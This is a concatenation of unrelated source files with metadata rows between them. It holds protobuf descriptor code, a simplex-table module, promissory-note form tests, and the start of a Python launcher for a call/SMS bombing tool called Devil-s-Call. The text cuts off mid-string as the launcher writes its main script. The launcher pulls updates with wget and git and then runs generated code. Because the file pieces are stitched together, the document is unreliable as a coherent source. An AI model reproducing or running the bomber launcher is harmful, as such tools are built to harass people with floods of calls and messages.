name='subject', full_name='Xrd.subject', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='aliases', full_name='Xrd.aliases', index=3,
number=4, type=9, cpp_type=9, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='properties', full_name='Xrd.properties', index=4,
number=5, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='links', full_name='Xrd.links', index=5,
number=6, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_PROPERTY = descriptor.Descriptor(
name='Property',
full_name='Property',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='nil', full_name='Property.nil', index=0,
number=1, type=8, cpp_type=7, label=1,
default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='type', full_name='Property.type', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='value', full_name='Property.value', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_LINK = descriptor.Descriptor(
name='Link',
full_name='Link',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='rel', full_name='Link.rel', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='type', full_name='Link.type', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='href', full_name='Link.href', index=2,
number=3, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='template', full_name='Link.template', index=3,
number=4, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='titles', full_name='Link.titles', index=4,
number=5, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='properties', full_name='Link.properties', index=5,
number=6, type=11, cpp_type=10, label=3,
default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_TITLE = descriptor.Descriptor(
name='Title',
full_name='Title',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='lang', full_name='Title.lang', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='value', full_name='Title.value', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[], # TODO(robinson): Implement.
enum_types=[
],
options=None)
_XRD.fields_by_name['properties'].message_type = _PROPERTY
_XRD.fields_by_name['links'].message_type = _LINK
_LINK.fields_by_name['titles'].message_type = _TITLE
_LINK.fields_by_name['properties'].message_type = _PROPERTY
class Xrd(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _XRD
class Property(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _PROPERTY
class Link(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _LINK
class Title(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _TITLE
| 33.146226
| 62
| 0.691333
| 889
| 7,027
| 5.241845
| 0.087739
| 0.094421
| 0.081116
| 0.069313
| 0.834979
| 0.799142
| 0.738197
| 0.720601
| 0.720601
| 0.720601
| 0
| 0.018113
| 0.175039
| 7,027
| 211
| 63
| 33.303318
| 0.785751
| 0.023339
| 0
| 0.735751
| 1
| 0
| 0.064615
| 0
| 0
| 0
| 0
| 0.004739
| 0
| 1
| 0
| false
| 0
| 0.031088
| 0
| 0.093264
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
55f33c6369e013d66ab79fefed26ae4ddddb569f
| 2,248
|
py
|
Python
|
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | null | null | null |
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | null | null | null |
Lab_05/create.py
|
SimonRussia/TPR
|
72f87e17ed7430378e183e8e2cb0778c5075da97
|
[
"MIT"
] | 2
|
2021-09-28T11:20:34.000Z
|
2021-12-19T20:32:45.000Z
|
# CREATE
import numpy as np
class Player_A(object):
def __init__(self, A):
self.c = None
self.b = None
self.A = A
self.marks_col = None
self.marks_row = None
self.marks_basis = None
self.matrix = None
self.start()
def fillMarks(self, A):
_A = np.array(A.transpose() )
size_c = np.shape(_A)[1]
size_b = np.shape(_A)[0]
self.c = np.ones(size_c) * -1
self.b = np.ones(size_b) * -1
temp_col = []
temp_row = []
for i in range(size_c + 1):
if i == 0:
temp_col.append( "1/g" )
else:
temp_col.append( "u{}".format(i) )
pass
for i in range(size_b):
temp_row.append( "u{}".format(i + size_c + 1) )
pass
temp_row.append( "W" )
self.marks_col = np.array(temp_col)
self.marks_row = np.array(temp_row)
self.marks_basis = np.array(temp_col[ 1 : (size_c + 1) ] )
pass
def createTable(self, c, b, A):
_A = np.array(A * -1)
temp = np.vstack( (b, _A) )
temp = temp.transpose()
_W = np.hstack( ([0], c) )
temp = np.vstack( (temp, _W) )
self.matrix = np.array(temp)
pass
def start(self):
self.fillMarks(self.A)
self.createTable(self.c, self.b, self.A)
pass
class Player_B(object):
def __init__(self, A):
self.c = None
self.b = None
self.A = A
self.marks_col = None
self.marks_row = None
self.marks_basis = None
self.matrix = None
self.start()
def fillMarks(self, A):
size_c = np.shape(A)[1]
size_b = np.shape(A)[0]
self.c = np.ones(size_c)
self.b = np.ones(size_b)
temp_col = []
temp_row = []
for i in range(size_c + 1):
if i == 0:
temp_col.append( "1/h" )
else:
temp_col.append( "v{}".format(i) )
pass
for i in range(size_b):
temp_row.append( "v{}".format(i + size_c + 1) )
pass
temp_row.append( "Z" )
self.marks_col = np.array(temp_col)
self.marks_row = np.array(temp_row)
self.marks_basis = np.array(temp_col[ 1 : (size_c + 1) ] )
pass
def createTable(self, c, b, A):
_A = np.array( A.transpose() )
temp = np.vstack( ( b, _A) )
temp = np.array( temp.transpose() )
_Z = np.hstack( ([0], c ) )
temp = np.vstack( (temp, _Z) )
self.matrix = np.array(temp)
pass
def start(self):
self.fillMarks(self.A)
self.createTable(self.c, self.b, self.A)
pass
| 17.426357
| 60
| 0.600979
| 386
| 2,248
| 3.326425
| 0.124352
| 0.074766
| 0.077103
| 0.034268
| 0.90109
| 0.90109
| 0.827103
| 0.827103
| 0.786604
| 0.739875
| 0
| 0.01216
| 0.231762
| 2,248
| 128
| 61
| 17.5625
| 0.731326
| 0.002669
| 0
| 0.704545
| 0
| 0
| 0.008929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0.113636
| 0.011364
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
36458dec5bd53f5801f51cb326203cfb5c9718f9
| 19,088
|
py
|
Python
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | 1
|
2019-10-08T20:12:52.000Z
|
2019-10-08T20:12:52.000Z
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | 1
|
2019-05-04T23:58:24.000Z
|
2019-05-07T11:23:10.000Z
|
tests/gateways/test_web.py
|
flaviogf/promissory_note
|
6250515c1688a450e325b8fa0d22be62c8aad43f
|
[
"MIT"
] | null | null | null |
import unittest
from datetime import date
from unittest.mock import patch
from promissory_note.gateways.web import app, IssuePromissoryNoteForm
class IssuePromissoryNoteFormTests(unittest.TestCase):
def test_should_returns_true_when_validate_is_called_with_form_valid(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertTrue(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_number(self):
data = {
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_due_date(self):
data = {
'number': 100,
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_value(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_name(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_cpf(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_beneficiary_email(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_currency(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_city_payment(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_state_payment(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_name(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_cpf(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_address(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_email(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_issuance_date(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_due_data_of_data_returns_instance_of_datetime(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['due_date'], date)
def test_should_issuance_date_of_data_returns_instance_of_datetime(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['issuance_date'], date)
def test_should_number_of_data_returns_instance_of_int(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['number'], int)
def test_should_value_of_data_returns_instance_of_float(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['value'], float)
class AppTests(unittest.TestCase):
def test_should_returns_status_ok_when_send_request_to_index(self):
client = app.test_client()
response = client.get('/')
self.assertEqual(200, response.status_code)
def test_should_returns_template_with_title_promissory_note_when_send_request_to_index(self):
client = app.test_client()
response = client.get('/')
self.assertTrue(b'Promissory Note' in response.data)
@patch('promissory_note.gateways.web.PillowImageGenerationService')
@patch('promissory_note.gateways.web.SendGridEmailPromissoryNoteIssued')
def test_should_returns_status_redirects_when_post_request_is_valid(self,
pillow_image_generation_service,
send_grid_email_promissory_note_issued):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
client = app.test_client()
response = client.post('/', data=data)
self.assertEqual(302, response.status_code)
@patch('promissory_note.gateways.web.PillowImageGenerationService')
@patch('promissory_note.gateways.web.SendGridEmailPromissoryNoteIssued')
def test_should_returns_status_ok_when_post_request_is_invalid(self,
pillow_image_generation_service,
send_grid_email_promissory_note_issued):
data = {
'number': 100,
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
}
client = app.test_client()
response = client.post('/', data=data)
self.assertEqual(200, response.status_code)
| 39.766667
| 112
| 0.581098
| 1,921
| 19,088
| 5.438834
| 0.054659
| 0.081738
| 0.053599
| 0.076378
| 0.950804
| 0.941233
| 0.931183
| 0.927929
| 0.927929
| 0.927929
| 0
| 0.042494
| 0.284943
| 19,088
| 479
| 113
| 39.849687
| 0.722983
| 0
| 0
| 0.859951
| 0
| 0
| 0.314176
| 0.034472
| 0
| 0
| 0
| 0
| 0.056511
| 1
| 0.056511
| false
| 0
| 0.009828
| 0
| 0.071253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
367d212aef1896bc75b2576cd5f40e4dbacfde3e
| 49
|
py
|
Python
|
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
from .logger_utils import *
from .logger import *
| 24.5
| 27
| 0.77551
| 7
| 49
| 5.285714
| 0.571429
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 2
| 28
| 24.5
| 0.880952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d124dd068c20d535b3e9471ddd24eb8ebc3b8f3
| 198,163
|
py
|
Python
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 24
|
2021-03-25T16:13:18.000Z
|
2022-03-17T18:25:33.000Z
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 1
|
2022-03-06T07:41:56.000Z
|
2022-03-06T07:41:56.000Z
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 4
|
2021-04-05T16:16:38.000Z
|
2022-01-24T05:54:21.000Z
|
#!/usr/bin/python3
# This Python file uses the following encoding: utf-8
import getpass
import base64
import multiprocessing
import gettext
import sys
#import ssl
import re
import json
import subprocess
import ctypes
import random
import datetime
from time import sleep
from os import system, environ, path, getuid
from distutils.dir_util import copy_tree
from multiprocessing import Process
from subprocess import check_output, CalledProcessError
from sys import stdout, argv, exit
#change is done
import getpass
import base64
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def verCheck():
system('clear')
print("\n{0}[{2}#{0}] {2}Checking For Updates{2}...".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW ))
system('wget -q -O test.txt https://raw.githubusercontent.com/404-ghost/Devil-s-Call/master/version.txt')
system('clear')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
file2 = open('test.txt','r')
b = file2.read()
z = b.split("\n")
file.close()
file2.close()
if x[0] == z[0]:
print("{0}[{2}#{0}] {2}[Up-To-Date]- {0}v {6}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0]))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull --quiet')
system('rm -rf test.txt')
sleep(2)
else:
print("\n{0}[{2}#{0}] {2}Their Is A Newer Version Available.".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}#{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}#{0}] {0}[{2}Available{0}]{2}- {0}v.{7}".format(RED, WHITE, CYAN, GREEN, DEFAULT, YELLOW, x[0], z[0]))
print("{0}[{2}#{0}] {2}Updating To The Latest Version {0}[{2}v {6}{0}] \n{0}[{2}#{0}] {2}Please Wait....{7}\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0] ,GREEN2))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull')
sleep(1)
system('rm -rf test.txt')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
print("{0}[{2}*{0}] {2}Version Status After Update.{2}.\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}*{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}*{0}] {0}[{2}Available{0}]{2}- {0}v.{7}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, x[0], z[0]))
sleep(1)
system('clear')
print("\n\n\n\t\t{2}[{0}#{2}] {0}Restart program \n {2}Enter this command to run {0}-> {3}python3 devilscall.py".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
exit()
def loadingHack():
system("clear")
print("\n\n{3}".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW))
chaine ="/////////////////////"+"[*]"+" Starting Devil-s-Call......"+"/////////////////////".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW)
charspec = "$*X^%\#~?;"
i=0
while i<1:
chainehack = ""
i +=1
for c in chaine:
chainehack += c
r = random.choice(charspec)+random.choice(charspec)+random.choice(charspec)
if len(chainehack+r) <= len(chaine):
pass
else:
r = ""
sys.stdout.write('\r'+chainehack+r)
sleep(0.06)
system("python3 .main_bomb.py")
def magic():
file1 = open(".main_bomb.py", "w")
L = '''
